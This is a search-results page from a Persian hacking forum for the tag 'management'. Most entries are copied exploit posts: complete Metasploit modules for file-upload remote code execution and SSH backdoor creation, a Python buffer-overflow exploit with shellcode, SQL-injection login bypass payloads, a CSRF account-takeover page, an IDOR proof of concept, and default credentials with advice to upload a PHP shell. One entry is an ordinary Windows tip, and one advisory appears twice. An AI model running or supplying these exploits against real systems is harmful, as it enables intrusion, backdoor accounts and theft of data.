امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'management'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

11 نتیجه پیدا شد

  1. *Exploit Title:* IDOR on ProConf Peer-Review and Conference Management System *Date:* 19/07/2018 *Exploit Author:* S. M. Zia Ur Rashid *Author Contact:* https://www.linkedin.com/in/ziaurrashid/ *Vendor Homepage:* http://proconf.org & http://myproconf.org *Affected Version:* <= 6.0 *Patched Version:* 6.1 *CVE ID:* CVE-2018-16606 *Description:* In ProConf before 6.1, an Insecure Direct Object Reference (IDOR) allows any author to view and grab all submitted papers (Title and Abstract) and their authors' personal information (Name, Email, Organization, and Position) by changing the value of Paper ID (the pid parameter). PROOF-OF-CONCEPT Step 1: Sign In as an author for a conference & submit a paper. Youall get a paper ID. Step 2: Now go to paper details and change the value of Paper ID (param pid=xxxx) to nearest previous value to view others submitted paper & authors information. http:// <http:> [host]/conferences/[conference-name]/author/show_paper_details.php?pid=xxxx
  2. ############################################ # Exploit Title: hycus Content Management System v1.0.4 Login Page Bypass # Author: Rednofozi # category : webapps # Tested On : Pardus / Debian Web Server # my team:https://anonysec.org # me : Rednofozi@yahoo.com # Software Link: http://demosite.center/hycus/ # Vendor Homepage: http://www.hycus.com/ ############################################ ####################Proof of Concept ############# #Proof Of Concept use login bypass payload for username= '=' 'OR' for password= '=' 'OR' ----------------------------------------------------------------------------------- ----------------------------------------------------------------------------------- ###################### # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/1991
  3. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Novell ZENworks Configuration Management Arbitrary File Upload', 'Description' => %q{ This module exploits a file upload vulnerability in Novell ZENworks Configuration Management (ZCM, which is part of the ZENworks Suite). The vulnerability exists in the UploadServlet which accepts unauthenticated file uploads and does not check the "uid" parameter for directory traversal characters. This allows an attacker to write anywhere in the file system, and can be abused to deploy a WAR file in the Tomcat webapps directory. ZCM up to (and including) 11.3.1 is vulnerable to this attack. This module has been tested successfully with ZCM 11.3.1 on Windows and Linux. Note that this is a similar vulnerability to ZDI-10-078 / OSVDB-63412 which also has a Metasploit exploit, but it abuses a different parameter of the same servlet. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-0779'], ['OSVDB', '120382'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/zenworks_zcm_rce.txt'], ['URL', 'http://seclists.org/fulldisclosure/2015/Apr/21'] ], 'DefaultOptions' => { 'WfsDelay' => 30 }, 'Privileged' => true, 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'Novell ZCM < v11.3.2 - Universal Java', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 7 2015')) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), OptString.new('TARGETURI', [true, 'The base path to ZCM / ZENworks Suite', '/zenworks/']), OptString.new('TOMCAT_PATH', [false, 'The Tomcat webapps traversal path (from the temp directory)']) ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'GET' }) if res && res.code == 200 && res.body.to_s =~ /ZENworks File Upload Servlet/ return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def upload_war_and_exec(tomcat_path) app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => app_base }).to_s print_status("#{peer} - Uploading WAR file to #{tomcat_path}") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'POST', 'data' => war_payload, 'ctype' => 'application/octet-stream', 'vars_get' => { 'uid' => tomcat_path, 'filename' => "#{app_base}.war" } }) if res && res.code == 200 print_status("#{peer} - Upload appears to have been successful") else print_error("#{peer} - Failed to upload, try again with a different path?") return false end 10.times do Rex.sleep(2) # Now make a request to trigger the newly deployed war print_status("#{peer} - Attempting to launch payload in deployed WAR...") send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Failure. Unexpected answer break if res.code != 200 # Unless session... keep looping return true if session_created? end false end def exploit tomcat_paths = [] if datastore['TOMCAT_PATH'] tomcat_paths << datastore['TOMCAT_PATH'] end tomcat_paths.concat(['../../../opt/novell/zenworks/share/tomcat/webapps/', '../webapps/']) tomcat_paths.each do |tomcat_path| break if upload_war_and_exec(tomcat_path) end end end
  4. ====================================================================================================================================== | # Title : The Next Gen School Management Software - Menorah Academy 7.0 Backdoor Account Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit) | | # Vendor : https://codecanyon.net/item/the-next-gen-school-management-software-menorah-academy/19606916 | | # Dork : "Menorah Academy System" | ====================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] Use Admin : Owner Login: owner@owner.com/password Admin Login: admin@admin.com/password http://www.schoolsewa.com/mastersettings/settings/view/site-settings <=====| Edit Site Logo Upload here php evil file Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | | =======================================================================================================================================
  5. #!/usr/bin/python # Exploit Title: Easy File Management Web Server v5.6 - USERID Remote Buffer Overflow # Version: 5.6 # Date: 2015-08-17 # Author: Tracy Turben (tracyturben@gmail.com) # Software Link: http://www.efssoft.com/ # Tested on: Win7x32-EN # Special Thanks To: Julien Ahrens for the crafted jmp esp Trick ;) # Credits for vulnerability discovery: # superkojiman (http://www.exploit-db.com/exploits/33453/) from struct import pack import socket,sys import os host="192.168.1.15" port=80 junk0 = "\x90" * 80 # 0x1001d89b : {pivot 604 / 0x25c} # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,24C # RETN [ImageLoad.dll] # The memory located at 0x1001D8F0: "\x7A\xD8\x01\x10" does the job! # Due to call dword ptr [edx+28h]: 0x1001D8F0 - 28h = 0x1001D8C8 call_edx=pack('<L',0x1001D8C8) junk1="\x90" * 280 ppr=pack('<L',0x10010101) # POP EBX # POP ECX # RETN [ImageLoad.dll] # Since 0x00 would break the exploit needs to be crafted on the stack crafted_jmp_esp=pack('<L',0xA44162FB) test_bl=pack('<L',0x10010125) # contains 00000000 to pass the JNZ instruction kungfu=pack('<L',0x10022aac) # MOV EAX,EBX # POP ESI # POP EBX # RETN [ImageLoad.dll] kungfu+=pack('<L',0xDEADBEEF) # filler kungfu+=pack('<L',0xDEADBEEF) # filler kungfu+=pack('<L',0x1001a187) # ADD EAX,5BFFC883 # RETN [ImageLoad.dll] # finish crafting JMP ESP kungfu+=pack('<L',0x1002466d) # PUSH EAX # RETN [ImageLoad.dll] nopsled="\x90" * 20 # windows/exec CMD=calc.exe # Encoder: x86/shikata_ga_nai # powered by Metasploit # msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d' shellcode=("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" + "\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" + "\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" + "\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" + "\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" + "\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" + "\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" + "\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" + "\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" + "\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" + "\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" + "\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" + "\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" + "\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" + "\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" + "\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" + "\xa5\x59\x50") payload=junk0 + call_edx + junk1 + ppr + crafted_jmp_esp + test_bl + kungfu + nopsled + shellcode buf="GET /vfolder.ghp HTTP/1.1\r\n" buf+="User-Agent: Mozilla/4.0\r\n" buf+="Host:" + host + ":" + str(port) + "\r\n" buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" buf+="Accept-Language: en-us\r\n" buf+="Accept-Encoding: gzip, deflate\r\n" buf+="Referer: http://" + host + "/\r\n" buf+="Cookie: SESSIONID=1337; UserID=" + payload + "; PassWD=;\r\n" buf+="Conection: Keep-Alive\r\n\r\n" print "[*] Connecting to Host " + host + "..." s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect=s.connect((host, port)) print "[*] Connected to " + host + "!" except: print "[!] " + host + " didn't respond\n" sys.exit(0) print "[*] Sending malformed request..." s.send(buf) print "[!] Exploit has been sent!\n" s.close()
  6. Trick-windows

    برنامهی Management Computer ویندوز، مجموعهای از ابزارهای مدیریتی است که اجازهی مدیریت یک رایانهی محلی یا از راه دور را به شما میدهد. جهت دسترسی به Computer Management راههای مختلفی وجود دارد. به ویژه در ویندوز 10 که تعدد این راهها بیشتر نیز شده است. در این ترفند به معرفی 7 راه مختلف جهت دسترسی به Management Computer در ویندوز 10 خواهیم پرداخت. 1 .از طریق منوی Start ابتدا بر روی دکمهی Start کلیک کنید تا منوی Start باز شود.
  7. Hacking

    ----------------------------------------------------------------------------------- |<!-- # Exploit Title: User Login and Management PHP Script - multiple vulnerabilities # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer # Dork: N/A # Date: 29.08.2017 # software link : https://www.codester.com/items/469/user-login-and-management-php-script # demo : http://froiden.cloudapp.net/LoginDashboard/index.php # Version: 3.04 # Category: Webapps # Tested on: windows64bit / mozila firefox # # |--!> |---------------------------------------------------------------------------------- 1) admin dashboard authentication bypass Description : An Attackers are able to completely compromise the web application built upon the user login and management php script as they can gain access to the admin panel and manage other users as an admin without authentication! Step 1: Create a rule in No-Redirect Add-on: ^http://localhost/LoginDashboard/admin/index.php Step 2: Access http://localhost/LoginDashboard/admin/dashboard.php Risk : Unauthenticated attackers are able to gain full access to the administrator panel and thus have total control over the application and users , including add admin user .. etc |---------------------------------------------------------------------------------- 2) account takeover - cross side request forgery Description : attacker can craft a malicious page and send it to any user who is already authenticated to change the password > exploitation < <html> <body> <form name="csrf_form" action="http://localhost/LoginDashboard/code/ajaxChangePassword.php?password=1234567890&cpassword=1234567890" method="POST"> <script type="text/javascript">document.csrf_form.submit();</script> </body> </html> |-----------------------------------------EOF-----------------------------------------
  8. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload', 'Description' => %q{ Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems. The application has a file upload vulnerability that can be exploited by an unauthenticated remote attacker to execute code as the SYSTEM user. Two servlets are vulnerable, FileUploadController (located at /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do). This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2016-1525'], ['US-CERT-VU', '777024'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'], ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/30'] ], 'DefaultOptions' => { 'WfsDelay' => 5 }, 'Platform' => 'win', 'Arch' => ARCH_X86, 'Privileged' => true, 'Targets' => [ [ 'NETGEAR ProSafe Network Management System 300 / Windows', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 4 2016')) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [true, "Application path", '/']) ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'), 'method' => 'GET' }) if res && res.code == 405 Exploit::CheckCode::Detected else Exploit::CheckCode::Safe end end def generate_jsp_payload exe = generate_payload_exe base64_exe = Rex::Text.encode_base64(exe) payload_name = rand_text_alpha(rand(6)+3) var_raw = 'a' + rand_text_alpha(rand(8) + 3) var_ostream = 'b' + rand_text_alpha(rand(8) + 3) var_buf = 'c' + rand_text_alpha(rand(8) + 3) var_decoder = 'd' + rand_text_alpha(rand(8) + 3) var_tmp = 'e' + rand_text_alpha(rand(8) + 3) var_path = 'f' + rand_text_alpha(rand(8) + 3) var_proc2 = 'e' + rand_text_alpha(rand(8) + 3) jsp = %Q| <%@page import="java.io.*"%> <%@page import="sun.misc.BASE64Decoder"%> <% try { String #{var_buf} = "#{base64_exe}"; BASE64Decoder #{var_decoder} = new BASE64Decoder(); byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe"); String #{var_path} = #{var_tmp}.getAbsolutePath(); BufferedOutputStream #{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path})); #{var_ostream}.write(#{var_raw}); #{var_ostream}.close(); Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path}); } catch (Exception e) { } %> | jsp.gsub!(/[\n\t\r]/, '') return jsp end def exploit jsp_payload = generate_jsp_payload jsp_name = Rex::Text.rand_text_alpha(8+rand(8)) jsp_full_name = "null#{jsp_name}.jsp" post_data = Rex::MIME::Message.new post_data.add_part(jsp_name, nil, nil, 'form-data; name="name"') post_data.add_part(jsp_payload, "application/octet-stream", 'binary', "form-data; name=\"Filedata\"; filename=\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\"") data = post_data.to_s print_status("#{peer} - Uploading payload...") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'), 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" }) if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name}.jsp"}/ print_status("#{peer} - Payload uploaded successfully") else fail_with(Failure::Unknown, "#{peer} - Payload upload failed") end print_status("#{peer} - Executing payload...") send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], jsp_full_name), 'method' => 'GET' }) handler end end
  9. Document Title: ================ Exagate WEBpack Management System Multiple Vulnerabilities Author: ======== Halil Dalabasmaz Release Date: ============== 07 OCT 2016 Product & Service Introduction: ================================ WEBPack is the individual built-in user-friendly and skilled web interface allowing web-based access to the main units of the SYSGuard and POWERGuard series. The advanced software enables the users to design their customized dashboard smoothly for a detailed monitoring and management of all the power outlet sockets & sensor and volt free contact ports, as well as relay outputs. User definition and authorization, remote access and update, detailed reporting and archiving are among the many features. Vendor Homepage: ================= http://www.exagate.com/ Vulnerability Information: =========================== Exagate company uses WEBPack Management System software on the hardware. The software is web-based and it is provide control on the hardware. There are multiple vulnerabilities on that software. Vulnerability #1: SQL Injection ================================ There is no any filtering or validation mechanisim on "login.php". "username" and "password" inputs are vulnerable to SQL Injection attacks. Sample POST request is given below. POST /login.php HTTP/1.1 Host: <TARGET HOST> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 37 username=root&password=' or 1=1-- Vulnerability #2: Unauthorized Access To Sensetive Information =============================================================== The software is capable of sending e-mail to system admins. But there is no any authorization mechanism to access e-mail logs. The e-mail logs can accessable anonymously from "http://<TARGET HOST>/emaillog.txt". Vulnerability #3: Unremoved Configuration Files ================================================ The software contains the PHP Info file on the following URL. http://<TARGET HOST>/api/phpinfo.php Vulnerability Disclosure Timeline: ================================== 03 OCT 2016 - Attempted to contact vendor after discovery of vulnerabilities 06 OCT 2016 - No response from vendor and re-attempted to contact vendor 07 OCT 2016 - No response from vendor 07 OCT 2016 - Public Disclosure Discovery Status: ================== Published Affected Product(s): ===================== Exagate SYSGuard 3001 (Most probably all Exagate hardwares affected that vulnerabilities) Tested On: =========== Exagate SYSGuard 3001 Disclaimer & Information: ========================== The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. Domain: www.bgasecurity.com Social: twitter.com/bgasecurity Contact: advisory@bga.com.tr Copyright © 2016 | BGA Security LLC
  10. Document Title: ================ Exagate WEBpack Management System Multiple Vulnerabilities Author: ======== Halil Dalabasmaz Release Date: ============== 07 OCT 2016 Product & Service Introduction: ================================ WEBPack is the individual built-in user-friendly and skilled web interface allowing web-based access to the main units of the SYSGuard and POWERGuard series. The advanced software enables the users to design their customized dashboard smoothly for a detailed monitoring and management of all the power outlet sockets & sensor and volt free contact ports, as well as relay outputs. User definition and authorization, remote access and update, detailed reporting and archiving are among the many features. Vendor Homepage: ================= http://www.exagate.com/ Vulnerability Information: =========================== Exagate company uses WEBPack Management System software on the hardware. The software is web-based and it is provide control on the hardware. There are multiple vulnerabilities on that software. Vulnerability #1: SQL Injection ================================ There is no any filtering or validation mechanisim on "login.php". "username" and "password" inputs are vulnerable to SQL Injection attacks. Sample POST request is given below. POST /login.php HTTP/1.1 Host: <TARGET HOST> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 37 username=root&password=' or 1=1-- Vulnerability #2: Unauthorized Access To Sensetive Information =============================================================== The software is capable of sending e-mail to system admins. But there is no any authorization mechanism to access e-mail logs. The e-mail logs can accessable anonymously from "http://<TARGET HOST>/emaillog.txt". Vulnerability #3: Unremoved Configuration Files ================================================ The software contains the PHP Info file on the following URL. http://<TARGET HOST>/api/phpinfo.php Vulnerability Disclosure Timeline: ================================== 03 OCT 2016 - Attempted to contact vendor after discovery of vulnerabilities 06 OCT 2016 - No response from vendor and re-attempted to contact vendor 07 OCT 2016 - No response from vendor 07 OCT 2016 - Public Disclosure Discovery Status: ================== Published Affected Product(s): ===================== Exagate SYSGuard 3001 (Most probably all Exagate hardwares affected that vulnerabilities) Tested On: =========== Exagate SYSGuard 3001 Disclaimer & Information: ========================== The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. Domain: www.bgasecurity.com Social: twitter.com/bgasecurity Contact: advisory@bga.com.tr Copyright © 2016 | BGA Security LLC
  11. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::Remote::SSH def initialize(info={}) super(update_info(info, 'Name' => "Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in Cisco Firepower Management Console. The management system contains a configuration flaw that allows the www user to execute the useradd binary, which can be abused to create backdoor accounts. Authentication is required to exploit this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt', # Original discovery & PoC 'sinn3r' # Metasploit module ], 'References' => [ [ 'CVE', '2016-6433' ], [ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ] ], 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Targets' => [ [ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ] ], 'Privileged' => false, 'DisclosureDate' => 'Oct 10 2016', 'CmdStagerFlavor'=> %w{ echo }, 'DefaultOptions' => { 'SSL' => 'true', 'SSLVersion' => 'Auto', 'RPORT' => 443 }, 'DefaultTarget' => 0)) register_options( [ # admin:Admin123 is the default credential for 6.0.1 OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']), OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']), OptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']), OptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']), OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']), OptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\'s SSH port', 22]) ], self.class) end def check # For this exploit to work, we need to check two services: # * HTTP - To create the backdoor account for SSH # * SSH - To execute our payload vprint_status('Checking Cisco Firepower Management console...') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213') }) if res && res.code == 200 vprint_status("Console is found.") vprint_status("Checking SSH service.") begin ::Timeout.timeout(datastore['SSH_TIMEOUT']) do Net::SSH.start(rhost, 'admin', port: datastore['SSHPORT'], password: Rex::Text.rand_text_alpha(5), auth_methods: ['password'], non_interactive: true ) end rescue Timeout::Error vprint_error('The SSH connection timed out.') return Exploit::CheckCode::Unknown rescue Net::SSH::AuthenticationFailed # Hey, it talked. So that means SSH is running. return Exploit::CheckCode::Appears rescue Net::SSH::Exception => e vprint_error(e.message) end end Exploit::CheckCode::Safe end def get_sf_action_id(sid) requirements = {} print_status('Attempting to obtain sf_action_id from rulesimport.cgi') uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi') res = send_request_cgi({ 'method' => 'GET', 'uri' => uri, 'cookie' => "CGISESSID=#{sid}" }) unless res fail_with(Failure::Unknown, 'Failed to obtain rules import requirements.') end sf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1] unless sf_action_id fail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi') end sf_action_id end def create_ssh_backdoor(sid, user, pass) uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi') sf_action_id = get_sf_action_id(sid) sh_name = 'exploit.sh' print_status("Attempting to create an SSH backdoor as #{user}:#{pass}") mime_data = Rex::MIME::Message.new mime_data.add_part('Import', nil, nil, 'form-data; name="action_submit"') mime_data.add_part('file', nil, nil, 'form-data; name="source"') mime_data.add_part('1', nil, nil, 'form-data; name="manual_update"') mime_data.add_part(sf_action_id, nil, nil, 'form-data; name="sf_action_id"') mime_data.add_part( "sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}", 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{sh_name}\"" ) send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'cookie' => "CGISESSID=#{sid}", 'ctype' => "multipart/form-data; boundary=#{mime_data.bound}", 'data' => mime_data.to_s, 'vars_get' => { 'no_mojo' => '1' }, }) end def generate_new_username datastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5) end def generate_new_password datastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5) end def report_cred(opts) service_data = { address: rhost, port: rport, service_name: 'cisco', protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { origin_type: :service, module_fullname: fullname, username: opts[:user], private_data: opts[:password], private_type: :password }.merge(service_data) login_data = { last_attempted_at: DateTime.now, core: create_credential(credential_data), status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: opts[:proof] }.merge(service_data) create_credential_login(login_data) end def do_login console_user = datastore['USERNAME'] console_pass = datastore['PASSWORD'] uri = normalize_uri(target_uri.path, 'login.cgi') print_status("Attempting to login in as #{console_user}:#{console_pass}") res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'username' => console_user, 'password' => console_pass, 'target' => '' } }) unless res fail_with(Failure::Unknown, 'Connection timed out while trying to log in.') end res_cookie = res.get_cookies if res.code == 302 && res_cookie.include?('CGISESSID') cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first print_status("CGI Session ID: #{cgi_sid}") print_good("Authenticated as #{console_user}:#{console_pass}") report_cred(username: console_user, password: console_pass) return cgi_sid end nil end def execute_command(cmd, opts = {}) @first_exec = true cmd.gsub!(/\/tmp/, '/usr/tmp') # Weird hack for the cmd stager. # Because it keeps using > to write the payload. if @first_exec @first_exec = false else cmd.gsub!(/>>/, ' > ') end begin Timeout.timeout(3) do @ssh_socket.exec!("#{cmd}\n") vprint_status("Executing #{cmd}") end rescue Timeout::Error fail_with(Failure::Unknown, 'SSH command timed out') rescue Net::SSH::ChannelOpenFailed print_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)') retry end end def init_ssh_session(user, pass) print_status("Attempting to log into SSH as #{user}:#{pass}") factory = ssh_socket_factory opts = { auth_methods: ['password', 'keyboard-interactive'], port: datastore['SSHPORT'], use_agent: false, config: false, password: pass, proxy: factory, non_interactive: true } opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do @ssh_socket = Net::SSH.start(rhost, user, opts) end rescue Net::SSH::Exception => e fail_with(Failure::Unknown, e.message) end end def exploit # To exploit the useradd vuln, we need to login first. sid = do_login return unless sid # After login, we can call the useradd utility to create a backdoor user new_user = generate_new_username new_pass = generate_new_password create_ssh_backdoor(sid, new_user, new_pass) # Log into the SSH backdoor account init_ssh_session(new_user, new_pass) begin execute_cmdstager({:linemax => 500}) ensure @ssh_socket.close end end end